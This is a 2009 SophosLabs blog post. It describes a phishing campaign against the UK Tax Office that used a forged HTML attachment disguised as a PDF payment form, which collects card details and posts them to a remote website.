Sophos

Download Windows 7 security - A great leap forward or business as usual?

« Malware from Rapidshare links Your Funds Will Be Transfered »

New Phishing Technique for the UK Tax Office

In my previous blog “Easy Steps to Stop Being Phished“, I described several common phishing techniques. Today, SophosLabs received a similar phishing scam targeting the UK Tax Office. This is a variant of the same thing that we encountered earlier for the Australia Tax Office. However, this time it uses a new technique.

The phishing message doesn’t contain any bogus link or dodgy reply-to field. Instead it has a forged html attachment named “payment_form.pdf”, which when opened, the file looks like a pdf form asking for users’ personal identities and credit card details.

Upon further investigation, the html file includes a dodgy POST HTTP request message (B) which attempts to submit confidential information to a remote website. Also, the file has functionalities to check invalid simple credit numbers and pin numbers (A). Isn’t that smart?

SophosLabs has already blocked this kind of phishing campaign. Certainly we will see more new tricky phishing techniques in the future.

Posted on August 6th, 2009 by Rowland, SophosLabs AU
Filed under: General, Spam

Email this story to a friend   Digg   Reddit   Technorati   Slashdot   Facebook   Twitter   NewsVine   MySpace   Google   Live   Mixx   del.icio.us   StumbleUpon  

Download Windows 7 security - A great leap forward or business as usual?

Related posts